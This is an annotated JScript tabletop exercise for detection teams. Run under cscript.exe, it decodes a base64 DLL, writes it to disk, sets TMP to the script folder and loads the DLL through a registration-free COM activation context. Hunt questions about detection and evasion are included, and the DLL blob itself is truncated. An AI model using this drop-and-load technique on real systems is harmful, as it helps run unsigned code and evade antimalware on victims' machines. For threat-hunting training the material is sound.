Table Top With Teeth - Training Exercise

Instructions

The following script is designed to create artifacts that teams can use to hunt for new or interesting capabilities.

The following table top is based on the code here: https://github.com/code-scrap/DynamicWrapperDotNet

This script is self-contained. It should dynamically write a DLL to disk and load it into cscript.exe.

To invoke: cscript.exe stranger_things.js. This example expects a 64-bit system; you can modify that if you want ARM or x86, etc.

Ideas of what to hunt/test:

  1. Did the anti-malware engine detect a malicious script?
  2. Did you observe the DLL written to disk?
  3. Did you observe the DLL / module load?
  4. What artifacts does this approach leave behind?
  5. How might an attacker change this script to evade detection? hint : that 'base64 blob lol'
// Directory containing this script: ScriptFullName with "\" + ScriptName trimmed off.
// Used below as the drop location for export.dll.
var scriptdir = WScript.ScriptFullName.substring(0,WScript.ScriptFullName.lastIndexOf(WScript.ScriptName)-1)
// Points this process's TMP variable at the script directory ('Process' scope, so
// the change is visible to this cscript.exe process and anything it spawns). The
// reason is not stated in the script -- presumably so that anything the loaded
// component writes under %TMP% lands beside the script; confirm. Note the
// JScript-specific assignment to a call expression: it sets the variable's value.
// A process-environment change like this is itself a candidate telemetry point.
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = scriptdir;
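// Base64 helper. Only an encoder is provided here (there is no decode member);
// decoding is done by Magic() below, which uses the same alphabet. The encoder is
// not called anywhere in this script. Input is treated as a sequence of 8-bit
// character codes, so it is only meaningful for strings whose char codes are < 256.
var Base64 = {
    characters: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
    // Encodes `a` three characters at a time into four alphabet symbols.
    // Padding ('=') is emitted only past the end of the input, so a NUL (0x00)
    // character is encoded like any other byte instead of being mistaken for
    // end-of-input, and an empty input yields "" rather than a padded block.
    encode: function (a) {
        var table = Base64.characters;
        var out = "";
        var len = a.length;
        var pos = 0;
        while (pos < len) {
            var has1 = pos + 1 < len;
            var has2 = pos + 2 < len;
            var b0 = a.charCodeAt(pos) & 255;
            var b1 = has1 ? a.charCodeAt(pos + 1) & 255 : 0;
            var b2 = has2 ? a.charCodeAt(pos + 2) & 255 : 0;
            var c0 = b0 >> 2;
            var c1 = ((b0 & 3) << 4) | (b1 >> 4);
            var c2 = has1 ? ((b1 & 15) << 2) | (b2 >> 6) : 64;
            var c3 = has2 ? (b2 & 63) : 64;
            out += table.charAt(c0) + table.charAt(c1) + table.charAt(c2) + table.charAt(c3);
            pos += 3;
        }
        return out;
    }
};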
// Decodes a base64 string into a "binary string" (one character per byte, char
// codes 0-255), which binaryWriter() then pushes through an iso-8859-1 stream.
// Throws Error("Not base64 string") when the input length is not a multiple of
// four or it contains characters outside the base64 alphabet (at most two
// trailing '=' are allowed).
function Magic(r) {
    var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    if (r.length % 4 != 0 || !/^[a-z0-9+\/]+={0,2}$/i.test(r)) {
        throw Error("Not base64 string");
    }
    var chunks = [];
    for (var pos = 0; pos < r.length; pos += 4) {
        // Four 6-bit symbols -> one 24-bit group; '=' maps to index 64.
        var q0 = alphabet.indexOf(r.charAt(pos));
        var q1 = alphabet.indexOf(r.charAt(pos + 1));
        var q2 = alphabet.indexOf(r.charAt(pos + 2));
        var q3 = alphabet.indexOf(r.charAt(pos + 3));
        var packed = (q0 << 18) | (q1 << 12) | (q2 << 6) | q3;
        var byte0 = (packed >>> 16) & 255;
        var byte1 = (packed >>> 8) & 255;
        var byte2 = packed & 255;
        if (q2 == 64) {
            chunks.push(String.fromCharCode(byte0));
        } else if (q3 == 64) {
            chunks.push(String.fromCharCode(byte0, byte1));
        } else {
            chunks.push(String.fromCharCode(byte0, byte1, byte2));
        }
    }
    return chunks.join("");
}
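// Decodes `res` (base64) with Magic() and writes the raw bytes to `filename`,
// overwriting any existing file. This is the disk-write artifact hunt question 2
// asks about: the decoded bytes go into an ADODB.Stream text stream opened as
// iso-8859-1 (a 1:1 char-to-byte charset, so the bytes are not re-encoded), are
// copied into a binary stream, and that stream is saved to disk.
function binaryWriter(res, filename) {
    var decoded = Magic(res);
    var textStream = new ActiveXObject('ADODB.Stream');
    textStream.Type = 2; // adTypeText
    textStream.charSet = 'iso-8859-1';
    textStream.Open();
    textStream.WriteText(decoded);
    var binaryStream = new ActiveXObject('ADODB.Stream');
    binaryStream.Type = 1; // adTypeBinary
    binaryStream.Open();
    textStream.Position = 0;
    textStream.CopyTo(binaryStream);
    // The original never closed the text stream; release it once it has been copied.
    textStream.Close();
    binaryStream.SaveToFile(filename, 2); // adSaveCreateOverWrite
    binaryStream.Close();
}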
// x64 dynwrapx.dll v 2.2.0 http://dynwrapx.script-coding.com/dwx/pages/dynwrapx.php?lang=en
// Base64-encoded DLL image -- the "base64 blob" hunt question 5 refers to. Only the
// leading 'TV' survives in this copy (the rest was removed); 'TV' decodes to 0x4D 0x5A,
// consistent with an 'MZ' PE header.
var dynwrapX = 'T' +'V'+ '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';
// Disk-write artifact: decode the blob and drop it beside the script as export.dll.
binaryWriter(dynwrapX,scriptdir+"\\export.dll");
// You could add a way to drop this dynamically
// Inline activation-context manifest: maps progid "DynamicWrapperDotNet" and clsid
// {185FAAFF-9A8A-41B4-809A-CA6EEAA95D61} to the file Export.dll without any registry
// entry (registration-free COM). How the relative file name is resolved is not shown
// here -- presumably via the script directory set up above; confirm.
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="Export" version="0.0.0.0"/> <file name="Export.dll"> <comClass description="Export Class" clsid="{185FAAFF-9A8A-41B4-809A-CA6EEAA95D61}" threadingModel="Both" progid="DynamicWrapperDotNet"/> </file> </assembly>';
var ax = new ActiveXObject("Microsoft.Windows.ActCtx");
ax.ManifestText = manifest;
// Module-load artifact (hunt question 3): creating the object through the activation
// context is expected to load Export.dll into this cscript.exe process.
var mdo = ax.CreateObject("DynamicWrapperDotNet");
// Exercise the object's methods. What getValue1/2/3 do is defined by the DLL and is
// not visible in this script.
var s = mdo.getValue1("a");
WScript.StdOut.WriteLine(s);
var t = mdo.getValue1("b");
// NOTE: `s` is redeclared and overwritten; the getValue1("a") result was already
// printed above, so the WriteLine below prints the getValue2() result.
var s = mdo.getValue2();
mdo.getValue3();
WScript.StdOut.WriteLine(s);
WScript.StdOut.WriteLine(t);